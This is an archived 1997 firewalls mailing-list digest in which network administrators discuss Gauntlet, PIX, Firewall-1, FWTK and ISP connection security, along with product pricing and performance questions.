From owner-firewalls-outgoing Sun Jun 1 01:00:10 1997
From: "VIOREL DEHELEAN"
Date: Sun, 1 Jun 1997 10:58:58 +0300
Subject: Test
Message-Id: <199706010748.KAA15416@flex.flex.ro>

Testing some mail bugs in Firewalls system...
Sorry

From owner-firewalls-outgoing Sun Jun 1 10:17:26 1997
From: Greg Harp
To: firewalls@greatcircle.com
Date: Sun, 01 Jun 1997 11:53:30 -0500
Subject: TIS Gauntlet -- pass all packets for certain IPs?
Message-Id: <3391A90A.167EB0E7@dfwnet.sbms.sbc.com>

I have an interesting problem. I have a new network (actually, a new service, but we'll leave out the "proprietary" details) going in which must necessarily be connected to both my main data network and the "outside" world, including both our customers and the "untamed" Internet. Here's a quick idea of how things go together:

[ASCII diagram garbled in the archive. Recoverable layout: a row of four boxes, "Main" data network -- Cisco router -- TIS Gauntlet -- Cisco router, the last connecting outward to both the Internet and the Customer network ("outside"); above the row, a "network entities" box stacked on top of the Service Complex box.]

I need TCP (telnet and X) and UDP (SNMP) access from the "Main" network to the service complex for management purposes. I must also pass both TCP and UDP (all ports) between the "outside" and the "network entities" (NEs, for short). The service complex acts as a transparent bridge for the IP addresses associated with the NEs. The IP addresses of the NEs (which have public Class C networks dedicated to them which differ from the rest of the internal net) are the only ones which will be accessible from the outside world (hence the only advertised routes), but as stated it must appear as if they are "directly" on the Internet or the customer's network. Security of the NEs themselves is of no concern, but security of the Service complex and the "Main" data network is of extreme concern. The customers are responsible for their own security, although we will not be routing packets between them and the Internet.

We currently have a TIS Gauntlet (v3.2a) system available for use in this application, but I'm stumped as to how to get it to "disappear" with respect to this certain range of addresses. For all intents and purposes, when faced with a source (when outgoing) or destination (when incoming) address in the range dedicated to the NEs, I want it to act like a router. At first, no other traffic will pass through the Gauntlet, although perhaps in the near future there will be certain authenticated traffic allowed to the Service complex itself, as well as possible traffic between the "Main" network and the Internet. These, of course, can be achieved using "normal, everyday" proxies and authentication.

I'm required to use an application gateway-type system here by company policy, with which I agree. While this restricted connectivity could be achieved via an access list in a router, that is not considered secure enough. We need the logging and "failsafes" of a real firewall.

Any suggestions of how to do this with the Gauntlet would be much appreciated. Although I'd prefer to use the TIS product, other ideas are also welcome. BTW, our corporate IS folks [ the ones who will audit this once I get it done ;) ] aren't big fans of the PIX firewalls.

TIA...
--Greg

From owner-firewalls-outgoing Sun Jun 1 11:20:49 1997
From: Jyri Kaljundi
To: Firewalls@GreatCircle.COM
Date: Sun, 1 Jun 1997 21:09:05 +0300 (EET DST)
Subject: Re: Security Crazy
In-Reply-To: <199706010800.BAA00511@honor.greatcircle.com>

Sat, 31 May 1997, Marcus J. Ranum wrote:

>> my CEO has gone security crazy [...] win95
>
> He's a bit unclear on the concept, isn't he?
I am pretty sure there actually are good commercial systems available to make a large number of win95 machines much more secure than they are out of the box. Axent Enterprise Access Control for Windows 95 is one such beast; more information is at http://www.axent.com/product/eacw/eacw.htm

Jüri

From owner-firewalls-outgoing Sun Jun 1 12:15:06 1997
From: "Randy.Witlicki."
To: firewalls@greatcircle.com
Date: Sun, 1 Jun 1997 15:19:57 -0400
Subject: Apparent ANSWER: Cisco PIX Version 4 udp problem

Don't you just love it when you answer your own post? So there I am, out for my afternoon run. Are nice spring thoughts in my mind? No, it's full of packets and protocols and such. A probable answer hits me, so I get back to the PIX and turn on verbose syslogging.

In my previous post I said:

> ...... PIX firewall Version 4.0.4
> However, when I try the Streamworks or VDOLive web plug-ins,
> I get the following at the PIX console (with no *established*
> command in the configuration):
>
> <162> 106006 deny inbound udp from x.x.x.x 7001 to 192.168.1.2 1144
> and
> <162> 106006 deny inbound udp from x.x.x.x 7001 to 192.168.1.2 1263

I try a site with VDO that I know is not very big. It works.
I go back to my test case and it fails. The PIX syslog output has:

<166> 304001 192.168.1.2 accessed URL 207.40.202.22:/nbrx.vdo HTTP/1.0

followed shortly by:

<162> 106006 deny inbound udp from 207.40.202.254 7001 to 192.168.1.2 1191

This is on http://intv.net

% traceroute intv.net
traceroute to intv.net (207.40.202.22), 30 hops max, 40 byte packets
......
15 AccessUS-1.ChcgIL.savvis.com (206.114.200.250)
16 vision.accessus.net (207.40.202.254)

So the URL was at .22 and the UDP stream came from .254, and it looks like the cisco PIX "enhanced multimedia Adaptive Security algorithm" (to use cisco's terminology) does not allow for this situation.

- Randy
randy.witlicki@valley.net
Norwich, Vermont USA

From owner-firewalls-outgoing Sun Jun 1 14:30:18 1997
From: Benedikt Stockebrand
To: Dana Bourgeois
Cc: "firewalls@GreatCircle.COM"
Date: 01 Jun 1997 14:44:33 +0200
Subject: Re: (Fwd) Ukiah Software
Message-ID: <87raemcx1q.fsf@devnull.ruhr.de>
In-Reply-To: Dana Bourgeois's message of Tue, 27 May 1997 10:15:28 -0700

Dana Bourgeois writes:

> No, the problem I have with businesses like cyberpromo is that one method
> they use to avoid SPAM filters is forged mail. Forged mail and news headers
> should be illegal with heavy criminal penalties and simple civil remedies
> (and triple damages!!)

Check the latest digest in the comp.risks newsgroup about this. Some folks are currently trying to sue a somewhat minor spammer---I suppose they want to create a precedent case so there'll be a reasonable chance to deal with the Big Bastards (TM) later on.

Ben
--
Ben(edikt)? Stockebrand Runaway ping.de Admin---Never Ever Trust Old Friends
My name and email address are not to be added to any list used for advertising purposes. Any sender of unsolicited advertisement e-mail to this address implicitly agrees to pay a DM 500 fee to the recipient for proofreading services.

From owner-firewalls-outgoing Sun Jun 1 15:04:34 1997
From: Patrik Backstrom
To: firewalls@greatcircle.com
Date: Sun, 1 Jun 1997 23:54:20 +0200 (MET DST)
Subject: Firewall-1 3.0 prices

I would like to know the approx listing prices for Firewall-1 unlimited users with and without encrypting support in the US and in the UK.

Thanks in advance.
/pb
---------------------------------------------------------------------
Patrik Bäckström (BOFH)        Phone........: +46-(0)706-661928
Hjalmar Bergmans gata 50       Homepage.....: http://warp.techno.org/~pb
422 52 Hisings Backa           E-Mail.......: pb@techno.org
PGP Pub Key......: http://warp.techno.org/~pb/pgpkey
           \.....: finger pb@techno.org
---------------------------------------------------------------------

From owner-firewalls-outgoing Sun Jun 1 15:49:03 1997
From: "Luke Gill"
Date: Sun, 1 Jun 1997 18:31:37 -0400
Subject: Sun Sparc20 FDDI and FAST Ethernet Performance Specs
Message-Id: <199706012233.SAA02365@smtp3.erols.com>

Has anyone tested the throughput on a Sun Sparc20 with sbus FDDI and FAST Ethernet cards? If so, what is the throughput? Also, if available, has the same testing been done with those cards with a Gauntlet firewall installed on the box?

Configurations I am interested in:

1. SUN FDDI sbus card to Sun FDDI sbus card
2. SUN FAST ethernet sbus card to Sun FAST Ethernet sbus card
3. #1 with Gauntlet 3.2a installed
4. #2 with Gauntlet 3.2a installed

I need these numbers to corroborate or disprove some testing I am currently doing in my own test environment. Any info would be appreciated.
Luke Gill

From owner-firewalls-outgoing Sun Jun 1 21:45:09 1997
From: Ken Hardy
To: VIOREL DEHELEAN
Cc: firewalls@GreatCircle.COM
Date: Sun, 1 Jun 1997 23:36:03 -0500 (CDT)
Subject: Re: Test
In-Reply-To: <199706010748.KAA15416@flex.flex.ro>

On Sun, 1 Jun 1997, VIOREL DEHELEAN wrote:

> Testing some mail bugs in Firewalls system...
> Sorry

You should be, disturbing thousands of disinterested people for your private testing needs.

Anyone who has occasional need to test outgoing and/or incoming mail handling should get a reflector account, such as is available for free from www.iname.com. Subscribe for an alias to your own real mail address. Send a message to the alias. If it lands in your mailbox you've successfully tested mail delivery in both directions. This makes for a quick and easy check of the integrity of the mail delivery system and of the firewall insofar as it's related.
Another indispensable tool is a shell account on a remote system from which you can examine your public DNS, see exactly how addresses in your outbound mail appear, run test probes of your own firewall, &c., &c., &c.

--
KH

From owner-firewalls-outgoing Mon Jun 2 02:15:17 1997
From: Cihan Subasi
Reply-To: csubasi@garanti.com.tr
Organization: Garanti Ticaret
To: Firewall Mailing List
Date: Mon, 02 Jun 1997 10:34:55 -0700
Subject: FW-1 evaluation....
Message-Id: <3393043F.27FF@garanti.com.tr>

I am in the process of evaluating FW-1 and also comparing it with SNG. In the demo environment we have one network (a C-class) as an internal network, one DMZ (a subnet of an A-class network) and an external network (the rest of the A-class network), but in reality we'll have the C-class on the external side and the rest of the A-class network will be the internal network. My question is how the subnets will route the Internet packets to the firewall, since their default gateway will not be FW-1. In SNG this problem was solved by using SOCKS: in each client we configured SNG as a SOCKS server, in which case all Netscape packets are forwarded to the SOCKS server.
I believe in FW-1 this forwarding should be done by configuring static routes in the gateways. Can anybody help me to solve this problem: how will I route all packets other than the ones with a destination address in the A-class network to the FW-1?

Thanks,

***************************************************************
Cihan Subasi
Garanti Ticaret, Istanbul Turkey
email= cihans@garanti.com.tr or csubasi@garanti.com.tr
Phone= +902126570404
Fax = +902126570473
***************************************************************

From owner-firewalls-outgoing Mon Jun 2 02:51:16 1997
From: Patrik Backstrom
To: firewalls@greatcircle.com
Date: Mon, 2 Jun 1997 11:44:22 +0200 (MET DST)
Subject: Sun Sparc 5 vs. Sun Ultra with Firewall-1

How much traffic can a Sun Sparc 5 handle with a Firewall-1? We currently have a 2MBit E1 connection to the Internet, and there are about 75-100 active connections at the same time, and it's steadily growing. About 25% of the connections are from 'hidden' private networks, so they have to be translated. Can a SS5 handle this, or should we go for an Ultra? What's the limit for what the SS5 can handle?

Thanks in advance.
/pb

From owner-firewalls-outgoing Mon Jun 2 03:49:22 1997
From: "Maurizio Fiocchi"
Date: Mon, 2 Jun 1997 12:33:47 +0200
Subject: PIX and Firewall-1
Message-Id: <199706021345.MAA09733@otmfire.otm.it>

I am appraising two firewalls, the first PIX and the second Firewall-1. From an attentive analysis I have noticed that the two SW have a notable difference regarding the characteristics of administration and of performance. I was wondering whether an analysis or a comparison between the two SW exists, so that I could choose without mistake. Do available documents exist?
Thank you

From owner-firewalls-outgoing Mon Jun 2 04:15:47 1997
From: "Walczak, Joe"
To: "'Firewalls@greatcircle.com'"
Date: Mon, 2 Jun 1997 07:14:58 -0400
Subject: RE: Intrusion testing Q&A
Message-Id: <199706021112.HAA01888@transquest.com>

Might I suggest ISS's Safesuite product. I was recently certified on the product, and it is the best for probing, intrusion and scanning. The firewall scanner portion does a good job by simulating hacker attack techniques as well.

Joe Walczak
TransQuest, Inc

> ----------
> From: Bill Stout[SMTP:stoutb@pios.com]
> Sent: Friday, May 30, 1997 5:20 PM
> To: firewalls@greatcircle.com
> Subject: Intrusion testing Q&A
>
> Is there a Firewall 'Intrusion testing' list somewhere?
>
> I would like to put on my 'black hat' and intrusion test systems I work
> with. I would like to put a step-by-step intrusion test procedure together
> to follow for each install. (Hmm, as I write this it occurs to me I could
> pick apart SATAN and such for starters)...
>
> I'm also looking for Windows-based IP Fragmentation tools to break-through
> Packet Filtering or State-based firewalls, and similar tools to break
> through 'generic-gw' ports that people kludge together for
> SQL/RealAudio/HTTPS/NetBIOS/NFS.
>
> 'Just the tools, maam', not theories. I also am specifically targeting
> breaking in, not D.O.S. attacks, and am ignoring trying to hide
> logging traces.
>
> Bill Stout
>
> P.S. - You might not want to cc' the list replying to this one...

From owner-firewalls-outgoing Mon Jun 2 05:00:18 1997
From: Adam Shostack
Message-Id: <199706021144.HAA15210@homeport.org>
Subject: Re: Encrypted traffic between FW-1 GUI client and FW-1 Management Server?
In-Reply-To: <338A9536.B6F42295@nii.ncb.gov.sg> from Martin Khoo at "May 27, 97 04:03:02 pm"
To: martin@nii.ncb.gov.sg
Date: Mon, 2 Jun 1997 07:44:00 -0400 (EDT)
Cc: drexx@pspi.com.ph, firewalls@GreatCircle.COM, Ronnie.Ng@Asia.Sun.COM, fw-1-mailinglist@us.checkpoint.com

I find the use of a proprietary, unpublished encryption algorithm for administration really quite scary. See the Snake Oil FAQ, http://www.research.megasoft.com/people/cmcurtin/snake-oil-faq.html for some arguments against secret and unpublished ciphers.

Also, the function you want in a FW remote admin module is authentication; encryption is useful for keeping your rules secret. (I assume that they're not passing the password over the encrypted link, since there is an obvious replay attack against the start of the connection.) You really want to know that the entire connection is the same one, and that no packet has been inserted, modified, or deleted. This is the functionality that you get from the IPsec Authentication Header. Encryption does not provide it.

Adam

Martin Khoo wrote:
| > |> Does anybody know whether the traffic between GUI Firewall
| > |> Management Client and Firewall Management
| > |> Server is encrypted or not?
| > I believe that if it's the VPN edition, the FW-1 traffic would then be
| > encrypted.
|
| Traffic between the GUI client and the Mgmt. server is encrypted (it has
| nothing to do with whether it is a VPN or non-VPN version) using
| Checkpoint's encryption algo. called FWZ1 (if I remember correctly)

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From owner-firewalls-outgoing Mon Jun 2 07:45:30 1997
From: Ken Kempster
Organization: Republic National Bank
To: fwtk, firewalls
Date: Mon, 02 Jun 1997 10:31:54 -0400 (EDT)
Subject: Plug-gw- One to many relationship

Hi all,

Has anyone gotten a one to many relationship to work with FWTK 2.0?

I want to be able to specify

x.x.x.x plug-to *

or

x.x.x.x plug-to x.x.x.x x.x.x.x etc.

thanx for any help.
Ken Kempster   kempster@monarch.rnb.com
Network Systems Engineer
Republic National Bank

From owner-firewalls-outgoing Mon Jun 2 08:45:25 1997
From: "Mariko Yashada"
To: "Firewalls Mailing List"
Date: Mon, 02 Jun 97 11:37:15 PDT
Subject: ISP Connection

My company is currently getting Internet access through a local ISP, using PPP connections. We are now considering replacing the dial-up connections with a leased line to the ISP. We will leave our web server at the ISP and will continue to use their e-mail server. There will be a router at the ISP end of the line. The line will connect to our Enterprise Network through a router at our end. We will also put a proxy server at our end to filter outgoing access and do NAT.

The ISP people say this type of connection is more secure than a direct connection to the Internet through, say, MCI, because our router will be "hidden" behind their routing system. The IP address of our router will not be accessible from outside the ISP domain. We will not allow incoming connections such as telnet or ftp.
We will restrict access from inside the company to e-mail, http, ftp and probably audio.

My question is, how secure is this type of connection? How difficult is it for someone outside the ISP domain to discover and access our connection?

Thanks,
Mariko

From owner-firewalls-outgoing Mon Jun 2 09:00:46 1997
From: "Chartas C. "
To: firewalls@GreatCircle.COM
Date: Tue, 03 Jun 1997 01:26:42 +1000
Subject: E-Commerce Links on various aspects
Message-id: <01IJM9Q1SC1EHT6XBR@vmsuser.acsu.unsw.EDU.AU>

Hi to all,

First of all, a big thank you to all who replied to my queries on EC and Firewall architecture a little while ago.
Secondly, as I had promised, here is a list about Electronic Commerce divided into the following sections:

A) EC
B) Standards
C) Security Issues
D) Government & Associations
E) Legal Issues
F) A Case Study
G) Various Authors on EC
H) Journals & News

A) On E-Commerce & Security

Electronic Commerce and Security
http://www.v-one.com/pubs/ecommerc/ecommerc.htm

Building a New Paradigm for Business
http://galaxy.tradewave.com:80/tradewave/products/whitpapr.html

http://www.saaconsultants.com/
http://www.saa-cons.co.uk/

Electronic Commerce Over The Internet
http://galaxy.tradewave.com:80/tradewave/products/vpiwp.html

The Internet and EDI
http://www.digital.com/info/edi/edi-inet.html

Electronic Commerce, EDI, EDIFACT and Security
http://www.email.demon.co.uk/eees/eees.htm

Electronic Commerce on Internet : Security challenge
http://www.syselog.fr/asia/singapore/expo_ce_security.html

Electronic Commerce Security
http://www.securityserver.com/cgi-local/ssis.pl/category/@elecom.htm

Eric Glover's links to Security and Electronic Commerce
http://ai.eecs.umich.edu/people/compuman/security_links.html

Electronic Commerce Security: Miscellaneous Topics
http://www.securityserver.com/cgi-local/ssis.pl/category/@elecom5.htm

B) On Standards

DISA Home Page
http://www.disa.org/

Secretariat of ECAT - Implementation Conventions
http://snad.ncsl.nist.gov/dartg/edi/ic.html

C) On Security Issues

Basic Flaws in Internet Security and Commerce
http://http.cs.berkeley.edu/~gauthier/endpoint-security.html

D) Government & Associations

Internet and Telecommunications Policy Presentation
http://werbach.com/fcc/iworld.html

Standards Australia On-line
http://www.standards.com.au/~sicsaa/

Federal Communications Commission (FCC) Home Page
http://werbach.com/fcc/

IEC - International Electrotechnical Commission - Home Page (English)
http://www.iec.ch/

Electronic Commerce World Institute
http://www.ecworld.org/

E) On Legal Issues

http://infohaus.com/access/by-seller/benjamin_Wright

F) A Case Study

Case Study: Electronic Commerce on The World Wide Web
http://www.cox.smu.edu/mis/cases/webcase/home.html

G) Various Authors

Roger Clarke's Home Page
http://www.anu.edu.au/people/Roger.Clarke/

ABA Electronic Commerce Division
http://www.abanet.org/scitech/ec/home.html

H) Journals & News on EC

On-line Security Frontier at EC World
http://yama.bus.utexas.edu/ejou/sec/

EC World: On-line journal for electronic commerce - Articles, Resource Directory, Discussions
http://ecworld.utexas.edu/

Online publication
http://www.commerce.net

ComputerWorld Emmerce
http://www.computerworld.com/emmerce/index.html

----------------
regards,
Constantinos C.

From owner-firewalls-outgoing Mon Jun 2 09:42:02 1997
From: "David Lang"
To: "Ken Kempster", "fwtk", "firewalls"
Date: Mon, 2 Jun 1997 08:28:49 -0700
Subject: Re: Plug-gw- One to many relationship
Message-Id: <199706021627.JAA07146@mail.diginsite.com>

This is not supposed to work.

David Lang

----------
> From: Ken Kempster
> To: fwtk ; firewalls
> Subject: Plug-gw- One to many relationship
> Date: Monday, June 02, 1997 7:31 AM
>
> Hi all,
>
> Has anyone gotten a one to many relationship to work
> with FWTK 2.0?
>
> I want to be able to specify x.x.x.x plug-to *
> or
> x.x.x.x plug-to x.x.x.x x.x.x.x etc.
>
> thanx for any help.
>
> |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
> | Ken Kempster                  kempster@monarch.rnb.com  |
> | Network Systems Engineer                                |
> | Republic National Bank                                  |
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


From: ArkanoiD
To: kempster@monarch.rnb.com (Ken Kempster)
Cc: fwtk-users@tis.com, firewalls@GreatCircle.COM
Subject: Re: Plug-gw- One to many relationship
Date: Mon, 2 Jun 1997 19:48:51 +0400 (MSD)

nuqneH,

> Has anyone gotten a one to many relationship to work
> with FWTK 2.0?
>
> I want to be able to specify x.x.x.x plug-to *
> or
> x.x.x.x plug-to x.x.x.x x.x.x.x etc.
>

..and how should destinations be distinguished?

--
CU in Hell /Arkan#iD
Do i believe in Bible? Hell,man,i've seen one!
From: Eric Vyncke
To: "Randy.Witlicki.", firewalls@GreatCircle.COM
Subject: Re: Apparent ANSWER: Cisco PIX Version 4 udp problem
Date: Mon, 02 Jun 1997 18:28:02 +0000

Hello Randy,

Your interpretation is probably correct... as the control connection is to .22 and the incoming data UDP stream comes from .254, the PIX obviously and securely denies the access. I cannot imagine any secure way of handling it.

BTW, even if I'm working in Cisco, I'm not THE PIX expert.

Best regards

Eric

At 15:19 1/06/97 -0400, Randy.Witlicki. wrote:
>
> Don't you just love it when you answer your own post?
> So there I am, out for my afternoon run. Are nice spring thoughts
>in my mind? No, it's full of packets and protocols and such.
> A probable answer hits me, so I get back to the PIX and
>turn on verbose syslogging.
> In my previous post I said:
>
>> ......
>> PIX firewall Version 4.0.4
>> However, when I try the Streamworks or VDOLive web plug-ins,
>>I get the following at the PIX console (with no *established*
>>command in the configuration):
>>
>><162> 106006 deny inbound udp from x.x.x.x 7001 to 192.168.1.2 1144
>> and
>><162> 106006 deny inbound udp from x.x.x.x 7001 to 192.168.1.2 1263
>
> I try a site with VDO that I know is not very big. It works. I go
>back to my test case and it fails. The PIX syslog output has:
>
><166> 304001 192.168.1.2 accessed URL 207.40.202.22:/nbrx.vdo HTTP/1.0
> followed shortly by:
><162> 106006 deny inbound udp from 207.40.202.254 7001 to 192.168.1.2 1191
>
> This is on http://intv.net
>% traceroute intv.net
>traceroute to intv.net (207.40.202.22), 30 hops max, 40 byte packets
> ......
>15 AccessUS-1.ChcgIL.savvis.com (206.114.200.250)
>16 vision.accessus.net (207.40.202.254)
>
> So the URL was at .22 and the UDP stream came from .254 and it looks
>like the cisco PIX "enhanced multimedia Adaptive Security algorithm"
>(to use cisco's terminology) does not allow for this situation.
>
> - Randy randy.witlicki@valley.net
> Norwich, Vermont USA
> -
>

Eric Vyncke
Internet, security consultant
Cisco Systems Belgium SA/NV
Phone: +32-2-778.4677
Fax: +32-2-778.4300
E-mail: evyncke@cisco.com
Mobile: +32-75-312.458
"Networks bring people together..."


From: Scott Lupfer - Colorado Springs
To: Mariko Yashada
Cc: Firewalls Mailing List
Subject: Re: ISP Connection
Date: Mon, 2 Jun 1997 11:11:30 -0600 (MDT)

Actually, this is secure, but it is not any less secure than MCI for instance. At a customer site, we have a connection to MCI and it is advertised as a class C address from MCI as part of the MCI.COM domain. The only difference we noticed when we researched this type of service was performance. With MCI we get full T-1 to the MCI Internet POP, whereas you may only get full T-1 to the ISP and then compete with everyone else for part of the bandwidth to the internet.

On Mon, 2 Jun 1997, Mariko Yashada wrote:

> Date: Mon, 02 Jun 97 11:37:15 PDT
> From: Mariko Yashada
> To: Firewalls Mailing List
> Subject: ISP Connection
>
> My company is currently getting Internet access through a local ISP, using
> PPP connections. We are now considering replacing the dial-up connections
> with a leased line to the ISP. We will leave our web server at the ISP and
> will continue to use their e-mail server. There will be a router at the ISP
> end of the line.
> The line will connect to our Enterprise Network through a
> router at our end. We will also put a proxy server at our end to filter
> outgoing access and do NAT.
>
> The ISP people say this type of connection is more secure than a direct
> connection to the Internet through say MCI, because our router will be
> "hidden" behind their routing system. The IP address of our router will not
> be accessible from outside the ISP domain.
>
> We will not allow incoming connections such as telnet or ftp. We will
> restrict access from inside the company to e-mail, http, ftp and probably
> audio.
>
> My question is, how secure is this type of connection? How difficult is it
> for someone outside the ISP domain to discover and access our connection?
>
> Thanks,
>
> Mariko
>

Scott Lupfer
Network/Systems Engineer
SSDS, Inc
E-mail: svl@ssds.com
21NET Phone: (719) 554-9833
Voice Mail: (719) 630-0100 x206
Pager: 1-800-931-5919
A radioactive cat has eighteen half-lives!


From: "Urban A. Haas"
To: csubasi@garanti.com.tr
Cc: Root Admin-KSoft, Firewall Mailing List
Subject: Re: SNG and performance...
Date: Mon, 02 Jun 1997 13:39:19 -0500
Cihan Subasi wrote:
>
> Root Admin-KSoft wrote:
> >
> > On Thu, 29 May 1997, Cihan Subasi wrote:
> >
> > > Anybody experienced SNG slowing down the traffic with 50+ users?
> > > I checked the line utilization and SNG, and seems like SNG is the
> > Depends on your config. For example do you use NAT? SOCKS? or PROXY?
> > how about your filter definitions?
> >
>
> I use both SOCKS and PROXY (telnet and ftp)

The proxy users are causing this. Proxy users are running local processes on the firewall (for each proxy user, a telnet or ftp session [process] is running on the firewall). SOCKS is more efficient than proxy [processes are not created for each session] and you should be able to increase the number of users going through the firewall at once. NAT/Filters is even more efficient yet, but you would need to be at v2 of the firewall code to have that option. If you are at v1, your best bet is to have all of your users use SOCKS instead of proxies. Or, you can get more firewalls, upgrade the CPU, etc.

>
> > Regards,
> > Kerem ERSOY
> >
> > > bottleneck but could it be the hardware causing this problem I believe
> > > memory is enough for 100 + user (we have 128Meg on it)....

--
Urban A. Haas
CEO - Urban Technology, Inc.
E-mail: uhaas@urbantechnology.com
Phone: (612) 938-2610


From: Larry Kwiat
To: Mariko Yashada
Cc: Firewalls Mailing List
Subject: Re: ISP Connection
Date: Mon, 2 Jun 1997 11:54:56 -0400 (EDT)

On Mon, 02 Jun 97 11:37:15 PDT Mariko Yashada wrote:

- the idea of taking an ISP's word that their leased line to you through a "private" router engaged in their system is sufficient to hang the company jewels on quite securely and without a firewall...

> My question is, how secure is this type of connection? How difficult is it
> for someone outside the ISP domain to discover and access our connection?

In my professional opinion, if an ISP salesman said that to me, I'd ask him to bring his technical people along for a discussion, where I'd ask them a whole series of techie questions the answers to which would probably be not satisfactory. That is because I work for a large integrated organization.
If I were in the same position in a large private organization with as much value on the line as the average government, I wouldn't bother that vendor with the inquisition, I would find another ISP.

In my opinion, a firewall is NECESSARY in the loop with the public internet. I wouldn't like to consider what might happen without one.

a) you don't have enough contracting authority in the usual arrangement with an ISP to ensure the proper steps are always taken on your behalf.
b) You can't manage change control at all on their system.
c) You have no assurance of high priority action on your behalf in the event of a breach of their security.

Strictly from a security management position, never mind the technicalities, I don't think what your ISP is proposing is what I would consider a good idea, if I were in your shoes...

This is a personal, professional opinion.

Sincerely,
Larry Kwiat
Information Security Coordinator
Information Services Branch
Department of Government Services
Government of Yukon
Phone: (403) 667-8081
Fax: (403) 667-5304
Netmail: kwiat@gov.yk.ca


From: "Kohn, Joav"
To: Mariko Yashada
Cc: Firewalls Mailing List
Subject: RE: ISP Connection
Date: Mon, 2 Jun 1997 13:44:33 -0500

unless you have a screening router (or proxy server, or firewall) at your end, you have no security at all. just cause the direct route to your network is hidden doesn't give you any security. if it made it impossible for the internet to reach you, none of your internet requests would ever get back to you. no matter how you go, ISP or MCI/SPRINT/ATT, you still need to get some type of protection on your end, under your control. after all, would you want to bank your company on your internet provider?

-joav kohn
sr. technical consultant
it/workgroup communications
landis & staefa

> > Date: Mon, 02 Jun 97 11:37:15 PDT
> > From: Mariko Yashada
> > To: Firewalls Mailing List
> > Subject: ISP Connection
> >
> > My company is currently getting Internet access through a local ISP, using
> > PPP connections. We are now considering replacing the dial-up connections
> > with a leased line to the ISP. We will leave our web server at the ISP and
> > will continue to use their e-mail server. There will be a router at the ISP
> > end of the line. The line will connect to our Enterprise Network through a
> > router at our end. We will also put a proxy server at our end to filter
> > outgoing access and do NAT.
> >
> > The ISP people say this type of connection is more secure than a direct
> > connection to the Internet through say MCI, because our router will be
> > "hidden" behind their routing system. The IP address of our router will not
> > be accessible from outside the ISP domain.
> >
> > We will not allow incoming connections such as telnet or ftp. We will
> > restrict access from inside the company to e-mail, http, ftp and probably
> > audio.
> >
> > My question is, how secure is this type of connection? How difficult is it
> > for someone outside the ISP domain to discover and access our connection?
> >
> > Thanks,
> >
> > Mariko
> >


From: Tim Thayer
To: "2LT Jeffery J. Lowder, 333-4615", "bpetrie@incc.net", "raptor-list@udc.com", "firewalls@greatcircle.com", "'Allen Rogers'"
Subject: RE: Does Raptor WebNOT Block Legitimate Sites?
Date: Mon, 2 Jun 1997 15:19:12 -0400

Allen, any movement on this issue? We are still getting complaints from users. The most recent was URL: www.emeregency.com

Tim Thayer
Information Security Branch
Banking & Trust

>Date: Tue, 11 Mar 1997 08:21:10 -0500 (EST)
>From: Allen Rogers
>To: "2LT Jeffery J. Lowder, 333-4615"
>Subject: Re: Does Raptor WebNOT Block Legitimate Sites?
>
>
>This is a list that Raptor licenses directly from Microsystems.
>The actual URLs used, and their abbreviated nature, is due to how Microsystems chooses
>to create their list. I am trying to open a formal path where our customers
>can present queries/requests to them directly for particular sites. I will
>keep you posted.
>
>-Allen
>
>At 09:29 AM 3/10/97 MST, 2LT Jeffery J. Lowder, 333-4615 wrote:
>>Hello,
>>
>>We recently installed Raptor WebNOT to work with our Raptor Eagle 4.0
>>firewall. Remember that WebNOT can be used to block access to
>>'unauthorized' sites, where 'unauthorized' is defined as sites the company
>>doesn't want its employees visiting.
>>
>>Apparently their database of 'bad' URLs contains many truncated URLs. If
>>the URL is just an IP address, everything works great. However, if the
>>URL is more than an IP address -- if the URL contains a directory path, a
>>filename, or both -- we've found that the URL is normally truncated when
>>listed in the WebNOT database. For example, the URL for DejaNews Research
>>Service,
>>
>>http://199.86.32.6/members/stick/
>>
>>is stored in the WebNOT database (httprating.db) as
>>
>>http://199.86.32.6/mem
>>
>>Now, I don't claim to have detailed knowledge of the computer at
>>199.86.32.6, but it stands to reason that there are probably multiple
>>subdirectories under the /members directory. Yet Raptor WebNOT blocks
>>access to ALL of these directories because apparently ONE of them contains
>>nudity.
>>
>>You can imagine how much I enjoy taking heat from customers because we're
>>blocking access to ostensibly legitimate sites.
>>
>>Am I not understanding something, or is this very poor design on Raptor's
>>part? Is there anyone else out there who uses Raptor WebNOT and has
>>experienced this problem?
>>
>>I tried calling Raptor directly to make a bug report, but since I don't
>>have a maintenance contract with Raptor, the operator at Raptor customer
>>support wouldn't even take my call.
>>
>>Lt Jeff Lowder
>>Chief, Network Security
>>United States Air Force Academy
>>
>>Disclaimer: The above content does not necessarily represent the views of
>>the United States Government or the United States Air Force Academy.
>>
>
>+-----------------------------------------------------------------------+
>Allen Rogers        | Raptor Systems Customer Support
>arogers@raptor.com  | http://www.raptor.com/cs/
>(617)487-7700 x128  | (888)-RAPTOR1 (617) 890-6532 (FAX)
>+-----------------------------------------------------------------------+
>


From: Joe Klemmer
Reply-To: klemmerj@webtrek.com
To: firewalls@GreatCircle.COM
Subject: ipfwadm question (and procmailrc test)
Date: Mon, 2 Jun 1997 16:28:20 -0400 (EDT)

I will be setting up a FW using RH Linux and ipfwadm (mainly because there's no funding to pay for a commercial product) and I have one quick question.
It's more related to the physical setup of the FW in that, if I'm not mistaken, I'd need to put the FW PC physically in front of all the nodes in the LAN, right? IOW, it should look like this:

         Gateway Box
              |
              |
         Firewall Box
              |
              |
          LAN Router
           /  |  \
          /   |   \
         /    |    \
    Node 1  Node 2  Node 3

I know this is in the FW books (Cheswick's and Chapman's) but I haven't had time to go into them much. This is really more a sticking point in my brain, I guess. I need a better visualization of this whole thing.

---
"It's a damn poor mind that can only think of one way to spell a word." -- Andrew Jackson


From: "Mr. Jolt Cola"
To: firewalls@greatcircle.com
Subject: Banyan ports through firewall?
Date: Mon, 2 Jun 1997 17:06:38 -0400 (EDT)

Could someone tell me what ports Banyan uses to communicate? I searched the web and came up with tcp and udp 567 and 573. The servers still do not talk through the firewall with these ports open. Any ideas? I'll probably just go out and do some packet sniffing but I was hoping someone here knew.
Thanks,
Melvin Smith


From: Bill Stout
To: firewalls@greatcircle.com
Subject: Performance and FR question
Date: Mon, 02 Jun 1997 14:25:43 -0700

Has anyone noticed performance issues with Frame Relay connections to the internet?

